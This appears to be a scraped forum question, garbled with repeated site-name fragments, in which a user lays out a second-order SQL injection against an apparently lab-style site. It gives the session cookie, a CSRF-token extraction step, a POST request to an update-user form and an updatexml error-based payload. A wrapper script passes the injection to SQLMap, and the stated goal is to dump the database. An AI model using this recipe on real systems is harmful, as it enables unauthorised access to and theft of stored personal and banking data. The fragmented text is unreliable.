blog.terahost.exam I first need to send a GET request to this url: http://me.terahost.exam/profile Use this as the cookie. Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0 Once you send a request in the response the following html code will be available. I need the CSRF token. In this request it is : b6d67a24906e8a8541291882f81d31ca Just store it in a variable. blog.terahost.exam How to get it for free? blog.terahost.exam Next is to use this in the update form for SQL injection. http://me.terahost.exam/update-user Use the same cookie as the cookie. Cookie: _sid_=4g63ah9pvms340pvinbhdk60j0 POST Data: "name=1&surname=1&email=1%401.com&street_address=8850+Egestas+Ave&city=Berlin". $INJECTION .&zip=29977-647&iban=GT33211377800379210569053628&password=&uID=500&acdt67gshfuiuasfsg=".$TOKEN; Please note the 2 variables $INJECTION where the the $GET['injection'] from the user. Place the extracted the $TOKEN in that place. blog.terahost.exam How to get it? blog.terahost.exam In this way we can easily perform sql injection like this and can pass this to SQLMap. This is my goal to dump the database using SQLmap in this 2nd order injection. localhost/ourscript.php?injection=' * updatexml(1,concat(0x7e,(select(schema()))),0) *' blog.terahost.exam